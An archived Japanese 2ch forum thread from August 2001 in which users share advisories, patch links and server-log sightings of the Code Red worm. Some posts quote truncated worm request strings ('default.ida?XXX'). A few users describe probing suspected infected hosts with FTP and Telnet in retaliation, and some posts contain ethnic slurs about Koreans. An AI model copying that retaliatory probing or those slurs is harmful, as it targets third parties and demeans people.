■ このスレッドは過去ログ倉庫に格納されています
コードレッド (Code Red) 赤丸が世界を覆う
- 1 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:09
- 猛威を振るっている Code Red とその亜種 (自称 Code Red II など)
についての情報を追いましょう。
●前スレ コードレッド (Code Red) 逝ってヨシ
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997150588
( ´Д`)/ 先生! よくわからないけど不安です
1. 使ってるOSは Windows NT4.0/2000ですか?
NT4.0 → 2.
2000 (Server だけじゃなくて Professional 含む) → 3.
どちらでもない → ヨカッタネ
2. http://www.microsoft.com/japan/technet/security/codeptch.asp#counterofnt4
を見てすぐに対処しよう
3. http://www.microsoft.com/japan/technet/security/codeptch.asp#counterofw2k
を見てすぐに対処しよう
( ´Д`)/ 先生! 感染しちゃったみたいです。
すぐに IIS を停止しよう。それから
http://www.microsoft.com/japan/technet/security/codeptch.asp#extermination
を見て駆除しましょう。でも、すでに他のバックドア(裏口)を作られ
ちゃってるかもしれないので、なるべくなら OS の再インストール
を。くれぐれも再インストール中に感染しないように注意。
重要リンク>>2)
そのたの情報>>3
感染の確認>>4-5
- 2 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:10
- IPA による CodeRed II 注意喚起 (日本語)
http://www.ipa.go.jp/security/ciadr/vul/20010727codered.html
JPCERT/CC による Code Red II 注意喚起 (日本語)
http://www.jpcert.or.jp/at/2001/at010019.txt
CERT Advisory 2001-23 和訳
http://www.reasoning.org/jp/cert/incident_notes/in-2001-09-j.html
マイクロソフト、Code Red対策で24時間電話問い合わせ窓口
http://biztech.nikkeibp.co.jp/wcs/show/leaf?CID=onair/biztech/msn/137249
MSによる防護策・駆除方法の説明
http://www.microsoft.com/japan/technet/security/codeptch.asp
逝っちゃってるプロバイダ情報
http://watch.impress.co.jp/broadband/news/2001/08/06/codered.htm
hash's Security Alert 2001-02
http://www.reasoning.org/jp/security_alerts/hashsa-2001-02.html
カンコックでは官公庁が感染
http://news.yahoo.co.jp/headlines/reu/010807/int/18345001_japan_47407_1.html
IISから、Apache for win32 にアップグレード (藁 >>3に詳しく
http://www.ring.gr.jp/pub/net/apache/docs/windows.html
- 3 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:10
- Code Red II 情報(英語) : 解析情報へのリンクあり
http://www.incidents.org/react/code_redII.php
Code Red II の警告と解析レポート (英語PDF)
http://aris.securityfocus.com/alerts/codered2/
CodeRed Scanner (英語) : CodeRed 感染の可能性があるホストをスキャン
http://www.eeye.com/html/Research/Tools/codered.html
ヤマハ RT80i, RT50i の脆弱性
http://www.rtpro.yamaha.co.jp/RT/FAQ/TCPIP/www-server-vulnerability.html
古川電工 MUCHO-E シリーズが受ける影響
http://www.humind.or.jp/~higasino/ML/infusers/2001-Aug/msg00003.html
崩壊させられているプロバイダ INTERLINK の障害情報
http://www.interlink.or.jp/notification/backno/2001/trb029.html
東アジア壊滅の図
http://www.security.nl/misc/codered-stats/
Code Red騒ぎでCode Redソーダが絶好調 (日本語)
http://www.zdnet.co.jp/news/0108/04/b_0803_11.html
●IISから、Apache for win32 にアップグレード
ダウンロードはここから
http://www.ring.gr.jp/pub/net/apache/dist/httpd/binaries/win32/apache_1.3.20-win32-no_src-r2.msi
使い方はここをみろ
http://www.ring.gr.jp/pub/net/apache/docs/windows.html
- 4 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:10
- なんらかの事情がありパッチを当てられない場合には
http://www.microsoft.com/japan/technet/security/codeptch.asp#counterofothers
に従い、
.idq、.idaのidq.dlへのアプリケーションマッピングの削除を行いましょう
個人ユーザーで Windows NT/2000 を使っている人も、念のため次の
確認をしましょう
・Ctrl-Alt-Del を押して「タスク マネージャ」を起動
・「プロセス」タブを押す
・Inetinfo.exe プロセスを探す
Inetinfo.exe があった人は、インデックスサービスの使用有無に
*かかわらず* 以下の確認をしましょう
- 5 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:11
- 対象商品などのリスト
http://www.microsoft.com/japan/technet/security/codeptch.asp
- 6 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:12
- こっちが本スレなんですか?
- 7 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:13
- おいおい(^^;
- 8 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:14
- こっちの方がまとまってるな。さてどうしたものか。
- 9 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:15
- ここが本スレでいいの?
- 10 :え〜ん:2001/08/09(木) 00:15
- こっちがほんすれね
- 11 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:15
- こっちで逝こうyo。
- 12 :あちらからコピペ:2001/08/09(木) 00:15
- >>1 に捧ぐこれまでのあらすじ
ふぇ〜ん、kr.から赤丸ばっかりでいいかげんいやづら・・・
__ __________________________
∨ コーナッタラ…
カタカタ____ ___
∧_∧ ||\ .\ |◎ |
(;´Д`) .|| | ̄ ̄| |:[].|
┌( つ/ ̄l| / ̄ ̄/ | =|
|└ ヽ |二二二」二二二二二二二二」
 ̄]|__)_) .| || | ||
/ ̄\ / . || / ||
◎ ◎..[____|| .[__||
==================================================
| | 海底ケブール斬ってヨシ!
||l ∧Ω∧ υ――――――――――
l|ll (´∀` ) ザクーリ <゚彡巛
.l|l ヽ ∨ ノ, <゚彡巛
_____l| (/`'( ) \ _____________
アNNN…(゚∀゚ ){,.,}.A。)グヒャ!( ゜∀゜)(゜∀゜)アdefault.ida?XXXXX…
 ̄ ̄ ̄ ̄ ̄ ̄  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
==================================================
(次の日)
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| モナーくん、昨日からカンコック工場と連絡取れないんだ。
| 悪いが今からこのDVDを届けてきてくれないか。
\___ _____________
∨
__ ! ∧_∧
/ /|∧_∧ (・∀・ )
|二|__|(;´Д`) (部長A)
川ニl二l一、⊂ ) | | |
 ̄ ̄ ̄ ̄ ̄|ノ (_(__)
|⊃ / ̄ ̄ ̄ ̄\ 10.255.211.10->80
| / ● ● 172.30.251.1->80
|Y Y \ 192.168.3.9->80
| | | ▼| 127.0.0.1->80
| \/ _人| ゾヌゾヌ…
| ___/
\ /
| | |
(__)_)
==================================================
(と、いうわけで)
∧ ∧ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
〜′  ̄ ̄( ゚Д゚)< Code Red 逝ってヨシ!
UU ̄ ̄ U U \_____________
- 13 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:16
- ではたびたび
おつかれ>>1-4
- 14 :なー:2001/08/09(木) 00:16
- >>12
おっと。先越された。
- 15 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:16
- ここはおしまい
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997283377
↑ こちらへどーぞ
- 16 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:16
- 混乱を避けるためこちらを本スレにします。以下同名のコードレッド (Code Red) 赤丸が世界を覆う
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997282899
は上げないでください。
- 17 :え〜ん:2001/08/09(木) 00:16
- >>1
お疲れ様、な、みんないいやつだろ
- 18 :1(失敗スレも):2001/08/09(木) 00:17
- 度々申し訳ありませんでした・・
こっちが本スレという事でいいのかな・・
失敗スレの方は削除依頼に出して参ります・・。
- 19 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:17
- >>15
来てますが?
- 20 :名無しさん@お腹いっぱい。 :2001/08/09(木) 00:17
- ゾヌゾヌ… ってゾヌアラーム?
- 21 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:17
- りょーかい>>16
- 22 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:17
- ここはおしまい
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997282899
↑ こちらへどーぞ
- 23 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:17
- >>1 お疲れさま
>>12 ちと長いがイイ!
- 24 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:17
- こんな事態になっても誰も市ねとか言わないあたりが良識人の集まった優良スレを匂わせています。
- 25 :23:2001/08/09(木) 00:18
- 誤爆すまん!
ここ終了デシタ
- 26 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:18
- ここはおしまい
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997282899
↑ こちらへどーぞ
- 27 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:18
- さてでは改めて質問。
パッチあてたらインデックスサービスはアンインストールする必要はないのですか?
- 28 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:19
- そして今なお巨大化する赤丸赤虫
http://www.security.nl/misc/codered-stats/geodist.gif
- 29 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:19
- ここが本スレ
- 30 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:19
- ここはおしまい
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997282899
↑ こちらへどーぞ
- 31 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:19
- お返事もらった
>日頃ASAHIネットをご利用いただきまして誠にありがとうございます。
>
>お問い合わせの件につきまして、以下にお答えさせていただきます。
>
>ご連絡ありがとうございます。
>ご連絡いただきました情報をもとに調査し、
>該当ユーザーに対してASAHIネット会員規約に基づき対処を
>とりましたことをご連絡いたします。
また、現在、CodeREDウィルス(ワーム)が蔓延しております。
不正アクセスが増加しているのもこのワームが原因と考えられます。
- 32 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:19
- おぃおぃ、こっちが本スレだろ?
>>3の東アジア壊滅の図がないと赤丸の意味がわかんないじゃんかよー
- 33 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:19
- ここはおしまい
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997282899
↑ こちらへどーぞ
- 34 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:20
- >>27
アンインストールの必要は無いと思われ。
それでも心配なら
http://www.microsoft.com/japan/technet/security/codeptch.asp#counterofothers
もやっておけば?
- 35 :なー:2001/08/09(木) 00:20
- なー
- 36 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:21
- どっちよ(笑
なんかもう一つは裏を名乗ってるけど
- 37 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:21
- ここはおしまい
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997282899
↑ こちらへどーぞ
- 38 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:22
- 夜は厨房多いね。
- 39 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:22
- >>36
こっちが本当、あっちは記念(藁
- 40 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:22
- >>27
アンインストールは必要ないが・・・
必要ないサービスなら止めてしまったほうがよろしいかと。
- 41 :厨房:2001/08/09(木) 00:22
- ここはおしまい
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997282899
↑ こちらへどーぞ
- 42 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:23
- まとまってるし こっちでいいでしょ
本スレage
- 43 :なー:2001/08/09(木) 00:23
- 明日の朝には勝負が付いてるよ。
- 44 :こっちが好み:2001/08/09(木) 00:23
- >>28
相変わらずエアーズロックの山頂に一匹
ところで警視庁の動きは?
明日の新聞には載るかな
こんな時ぐらい役目をはたせ>マスコミ
- 45 :36:2001/08/09(木) 00:23
- >>39
了解。たしかにこっちのほうがまとまってるし。37 は無視っつーことで。
- 46 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:23
- ここはおしまい
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997282899
↑ こちらへどーぞ
- 47 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:24
- しつこいよ〜
- 48 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:24
- 厨房ってアホだね。自分でこのスレのレス伸ばしてるし
- 49 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:24
- >>20
ソウダYO!
- 50 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:24
- ここはおしまい
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997282899
↑ こちらへどーぞ
- 51 :しみじみクン:2001/08/09(木) 00:24
- >>24
しみじみ語っていいですか…
そうですね、2chに書き込みしていて、こんな暖かい気持ちになったのは、初め
てです。なぜだか分かりませんが…
きっと、お祭り騒ぎの「…NNNN」、「…XXXX」パケットが、皆さん一人一人の心の
中にまで届いているのではないでしょうか?この未知なる訪問者は、ちょっと季節
はずれかもしれませんがサンタクロースのような存在なのではないでしょうか…
実害を受けたみなさまにはお悔やみ申し上げます。しかし、ネット上でここまで真
剣に「刻々と進化する状況を皆で共有して観察する…」機会というものが、これま
でにあったでしょうか?複雑な気持ちです…
- 52 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:24
- ここはおしまい
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997282899
↑ こちらへどーぞ
- 53 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:25
- しつこいコピペ
- 54 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:25
- ここはおしまい
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997282899
↑ こちらへどーぞ
- 55 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:25
- >>51
同意。今回の事件で「生きているインターネット」を実感したような気がします。
- 56 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:26
- そうだね、地震とか台風のときの妙な連帯感に似たものがあるね。
- 57 :え〜ん:2001/08/09(木) 00:26
- >>52
/)
、2)Y⌒ ⌒フ +
ッ-i'´ ⌒フ
(´ ,.-゙ー-、 ろ、
* シ彡ノ"ミVv )
* ノノノノ"ヽヽヽミ シ / ̄ ̄ ̄ ̄ ̄
. ,l')∩ ∩ |)|ヾ ミ < ハアハアくん逝ってよし
,○)、 ▽ ノjl| YY゙ \_____
{_∃ `l____/⌒'i|
 ̄ Yl"゙⌒lY | +
,ト|__/ハ i、
,iニiニiニユ ゙h,,)
ノtYTYヾ\
/''フ''''ー<"ヽ、
/__ノ \ノヽ、
(__) ゞ__)
- 58 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:26
- (;´д`)ハァハァ
- 59 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:26
- そんなにコピペしたいんなら
(;´д`)ハァハァスレに行け
- 60 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:26
- (;´д`)ハァハァ
- 61 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:26
- (;´д`)ハァハァ
- 62 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:27
- (;´д`)ハァハァ
- 63 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:27
- (;´д`)ハァハァ
- 64 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:27
- 荒しは無視。
せっかく最近セキュリティ板治安良くなってきたからね。
- 65 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:28
- 赤玉(;´д`)ハァハァ 赤玉(;´д`)ハァハァ 赤玉(;´д`)ハァハァ
赤玉(;´д`)ハァハァ 赤玉(;´д`)ハァハァ 赤玉(;´д`)ハァハァ
赤玉(;´д`)ハァハァ 赤玉(;´д`)ハァハァ 赤玉(;´д`)ハァハァ
赤玉(;´д`)ハァハァ 赤玉(;´д`)ハァハァ 赤玉(;´д`)ハァハァ
赤玉(;´д`)ハァハァ 赤玉(;´д`)ハァハァ 赤玉(;´д`)ハァハァ
- 66 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:28
- 赤玉(;´д`)ハァハァ 赤玉(;´д`)ハァハァ 赤玉(;´д`)ハァハァ
赤玉(;´д`)ハァハァ 赤玉(;´д`)ハァハァ 赤玉(;´д`)ハァハァ
赤玉(;´д`)ハァハァ 赤玉(;´д`)ハァハァ 赤玉(;´д`)ハァハァ
赤玉(;´д`)ハァハァ 赤玉(;´д`)ハァハァ 赤玉(;´д`)ハァハァ
赤玉(;´д`)ハァハァ 赤玉(;´д`)ハァハァ 赤玉(;´д`)ハァハァ
- 67 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:28
- 透明あぼ〜んてステキね
- 68 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:28
- 裏赤丸スレ(笑)から転載
http://www.security.nl/misc/codered-stats/geodist.gif
↓ その中心は....
http://jove.prohosting.com/~wingtxt/source/nakasu121.jpg
しかし、全体的に赤みが増えてるような..気のせいじゃないよね?
- 69 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:29
- どさくさに紛れてKRからpingが3発(`Д´)ムキー
- 70 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:29
- 昨日(8/7)感染していたサーバーにメールしておいたけど
今日(8/8)もアクセスあるんで見に行ったらIBMのApacheになってたよ。
なんか違う…。
- 71 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:30
- 裏に別のサーバーが隠れてるんじゃない?
- 72 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:30
- 個人的に、ARP祭りが終わらなくて微妙にうざい
- 73 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:31
- ping3発ぐらい可愛いもんじゃないか許したれよ>>69
- 74 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:34
- 8/9 最初のアタックは 61.78.77.170 でした。
とゆうわけで、寝よ。
- 75 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:35
- なんかDIONの感染者多い気がするんだけど、サポートがDQNなので要領を得ない。
あそこはもう終了だな。
- 76 :70:2001/08/09(木) 00:36
- >>71
昨日はIISだったから…。
- 77 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:37
- >>76
うーん....
- 78 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:38
- >>69
俺なんかメール出したらそのドメインからこっちのHP見に来られたっつーの。
普通に見るならまだしも、FTPとかTELNET試してやがる。
晒したろか・・・。
- 79 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:40
- 晒してよし。
- 80 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:40
- IPアドレスでHTTP叩いたらいきなりディレクトリインデックス出て、
こっちの方が情けない気持ちになったなぁ。
- 81 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:41
- 何のつもりだったんだろう?
- 82 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:42
- >>78
確かにそんなもんは晒してよし
- 83 :え〜ん:2001/08/09(木) 00:42
- >>78
それあると思う。だからメールしないで様子見てた。
どうせ落ちないし、うざいけど。
だっておれもFTPとかTELNET試したもの。
当然同じこと考えるよね。
- 84 :え〜ん:2001/08/09(木) 00:44
- *********
ここまで読んだ
寝る
おやすみ
- 85 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:45
- おつかれ。
- 86 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:46
- なんでコードレッドのアクセスってバ韓国なの…
- 87 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:47
- >>74
こっちは210.130.***.**だった。国内(w
- 88 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:48
- >>86
君の機械が韓国のそばにあるから。
- 89 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:49
- code red Vβって何ですか?
- 90 :おれのサーバー:2001/08/09(木) 00:50
- http://210.116.223.223/
この中国ページから大量にきてるんですけど
なんとかなりませんかね。
- 91 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:50
- 今日一発目のNNNが来た。
ドイツのDeutsche Telekomだと。
- 92 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:51
- >>90
中国じゃなくて韓国みたいですよ。
- 93 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:52
- あのー・・・ここ弐三日ルーターを自動接続にしておくと
勝手にAPに接続してしまってしかも課金されてるんですが
これってCode Redと関係あるんでしょうか。
- 94 :前の1:2001/08/09(木) 00:52
- >>1 不慣れなことお疲れさま。
とりあえず新ネタは無いけど攻撃は収まらず、だな。
まぁマターリといきましょう。
>>78
俺も対応要望メール出したら逆切れしてきたヴァカは
晒したろか(w
- 95 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:53
- >>91
ドイツテレコムもか、、、
http://www.telekom.de/
- 96 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:53
- >>91
お!NNNってまだ生きてたのか!
てっきりXXXに駆逐されたのかと。
- 97 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:55
- NNNだけど、うちには一日に10匹くらいは来てる。
- 98 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:56
- カンコックからのアタックって
default.nida
とかになっているの?
- 99 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:57
- 結構URL手打ちだったりして...
- 100 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:57
- >>98
ワラタ
- 101 :名無し:2001/08/09(木) 00:57
- もうコードレッドって収まったでしょ。
- 102 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:58
- >>93
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997150588&st=923&to=923&nofirst=true
で確認してみたら?
- 103 :名無しさん@お腹いっぱい。:2001/08/09(木) 00:58
- >>101
Nはね
- 104 :おれのサーバー:2001/08/09(木) 01:01
- 台湾も多いな
- 105 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:01
- 今朝早くが最後です>N
- 106 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:04
- >99
今IISログ確認してたら
XXXの後にMSIE5.0の文字が...
IP晒したろかゴルァ
- 107 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:05
- うちのとこは0:42に来てる>NNN
- 108 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:05
- >>106
晒してーん
- 109 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:05
- そういえば今日は N 型来てないな〜
繁殖期終わるのいつだっけ?
- 110 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:05
- >>106
ワラタ。晒したい気持ちはわかるが、止めとけ。
- 111 :91:2001/08/09(木) 01:07
- >>107
うちは0:43。何故か近いね。
- 112 :名無し:2001/08/09(木) 01:07
- [08/Aug/2001:19:43:40 +0900] 200 digibird.sun-star.co.jp "GET /default.ida?XXX
LOGをよく見たら こんなところからも co.jp は初めてだ。
- 113 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:07
- 容疑者ハケーン >>110
- 114 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:09
- 今フランスからXが来た。
ヨーロッパからは初めてだ。
- 115 :名無し:2001/08/09(木) 01:10
- フレッツだとコードレッド全く来ないのかな?
ゾヌ今月一回も警告ないや。
- 116 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:10
- あ、今N来た
- 117 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:10
- 夜は赤虫ヲチチャットか(w
- 118 :110:2001/08/09(木) 01:11
- >>113
え?オレ何の容疑者?
- 119 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:14
- たまにまざってるねNNN。なんか可愛く感じてしまうのは何故だろう。
- 120 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:17
- フランス、ニュージーランド、オランダからはたまに来てたけど、
今ログ見たらbrってのがあった。もしかしてそのままブラジルか?
- 121 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:19
- >>106
どうゆう意味?手動でバッファオーバーフロー試みてるの?
- 122 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:21
- この中心って日本じゃなくて朝鮮ですよね?
- 123 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:22
- CATVが軒並み逝ってるな・・・・
プライベート配ってるところにどうしてCodeRed侵入してるんだ?
どうしてIISがあるんだ?
実はCodeRedって、目眩ましか?
- 124 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:25
- うちには.it .de .nl .il .mxなんかから来てる。08/07くらいからかな。
- 125 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:27
- >>123
FrontpageExpressが元凶です。Frontpege→IISのM$凶悪コンボ炸裂しちゃってます。
- 126 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:28
- >>122
>>68 参照
- 127 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:29
- つーかなに?
漏れはW2KProだけどIISなんて入ってなかったぞ?
どういう違いだ?
- 128 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:32
- >>127
デフォじゃ入らないが、アプリのインスト時にIISまで入れちゃうソフトがある。
だから無知なくせにブロードバンドで鯖立てちゃったりしてるDQNが感染するってしくみです。
- 129 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:33
- >>127
デフォで入ってないだけ。
- 130 :やれやれ:2001/08/09(木) 01:34
- >>123
知らんが約款守らずにやってるのかもよ
ルータ禁止なのに使ってるのがいるらしいから
故意にIIS立てちゃってるのがいてもオカシくない
M$は24時間態勢を敷いたとか
警視庁はサーバ管理者に連絡とってるとか
まさにシステム管理者の眠れない夜だな。
さて、寝るか。
- 131 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:34
- >>128
なんでWindows Updateに入れてないんだ?
sadmindやCode Red Iのときに・・・
- 132 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:34
- まあ、鯖立ててるって気がつかなきゃ対策もしないよなあ。
- 133 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:35
- IP addressの最初のバイトが違うとこから来る赤丸君はなんだか当たりくじみたい。
ランダムにIPを選ぶ確率が1/8でさらにそこから選ばれるってのは結構な確率でしょう。
まあ、それだけ感染したサーバが多いって事でしょうか。
- 134 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:35
- >>130
たしかーに。しかしまっったく、警察なんか出なくても、プロバが自分でやれ!!て感じかな?
さて、俺もねるか。
- 135 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:37
- ていうことは、自分でCodeRedばらまきながらプロバイダに「遅せーぞ!どうなってんだゴラァ!」
って息巻いてる奴が居るって事だな。鬱だ。
- 136 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:38
- そいえば自分のとこにJCOM関西から来たのがあったな・・・
- 137 :赤丸急上昇:2001/08/09(木) 01:40
- 暇なんでメール連絡の結果、ガックシした例:
教育機関、某大学系、whoisで調べた技術管理者アドレスは大抵エラーで返送される。
それならばとサイトにお邪魔しホームページのリンクからinfo@ だの、webmaster@だのと出すも大抵管理者は使ってないアドレスで一向に読んでる風じゃない。
情報教育機関って結構いい加減なのがよくわかった。
某ニュースグループ
NT、2000系は今頃になってログに変なのがと慌てるバカがいる、フォローの内容もちょっと遅れているし、言うことが変。自分もIISとApache両方使う立場だが、恥ずかしくなってくるようなユーザーが多い。
- 138 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:42
- >>135
とりあえずアタックしてきた奴の胴元プロバに片っ端から電話してるのだっが対応が様様で笑える。
コードレッドというのはソフトの名前でしょうか?
なんてほのぼのしたところから
私どもは莫大なユーザーに利用していただいておりますのでお客様個別に連絡するということはできません。
なんて放任主義から
担当者に代わってログを送ってくれなんてできたところまで。
次回プロバ乗り換えの際の参考になった。
- 139 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:43
- >>137
2chが一番情報早くて一番役に立ったよ。
バックドアから侵入して喜んでるお馬鹿さんもいたみたいだけど。
- 140 :J-COMユーザー:2001/08/09(木) 01:44
- うちに来たJ-COMなのに感染野郎は、現在63人。
ARP台風止まりませーん!
- 141 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:45
- ARP台風って何ですか?
- 142 :断末魔:2001/08/09(木) 01:47
- 結局2chは、今回4日夜からのリアルタイム中継とイウコトデ
どこよりも情報速かったよ。一日遅れで気づいてたらやられてた
IISって結構いるとおもうぜ。助かったヤツ、感謝しろyo。
- 143 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:47
- 今のところ10ヶ国からアクセスがありました。
日本、韓国、台湾、アルゼンチン、タイ、アメリカ、オーストラリア
カナダ、ドイツ、ノルウェー
- 144 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:48
- しかし疑問なのがred codeと同時にnetbios名をとりにくるやつだな。
なんなんだろう?
- 145 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:49
- >>141
さっきよりちょっとましになって、平均で秒間25発のARP。
まあ別にいいんだけどさ
- 146 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:50
- >>144
漏れもなにかと思ってたけど、netbios名取りに来る奴は
必ずホストネームが無いよ。 何か関係ある?
- 147 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:50
- >>144
ファイヤーウォールの侵入者身元割り出し機能では?
- 148 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:51
- ARP?それCodeRedと関係ないのでは?
- 149 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:52
- 旧に止んだんだけど、テレホ夏厨が寝たからでしょうか?
ダイヤルアップで感染しちゃうなんて運がないというかご愁傷様です。
- 150 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:52
- >>147
BlackICEについてるね。
自分は防御してるから、クエリに反応しない。
- 151 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:53
- >>144
>>147>>150
それ、あんた感染してないか?(w
- 152 :150:2001/08/09(木) 01:55
- >>151
いや、入れてないしIIS(藁
- 153 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:57
- >>144
@niftyだけど、うちにはないな。
月曜の昼、UDPで高いポート番号のアクセスが数種類(裏口仕込み・起動→アクセス?)
があったけど。
- 154 :144:2001/08/09(木) 01:58
- >>151
そいつは確認済みだぜ、べいべー
- 155 :名無しさん@お腹いっぱい。:2001/08/09(木) 01:59
- >>123
http://www.keepoint.com/
十Qの場合こんな所がCATVと専用線の両方にIIS鯖立ててるから内部に流れてしまうのさ。
実際ここからのアタックは流行り始めてから現在までアタック数第一位。
- 156 :144:2001/08/09(木) 02:01
- >>153
うちも実はニフティ。で、今調べたら相手は佐賀からフレッツISDNで
ニフティ(笑)なんなんだろうなあ。
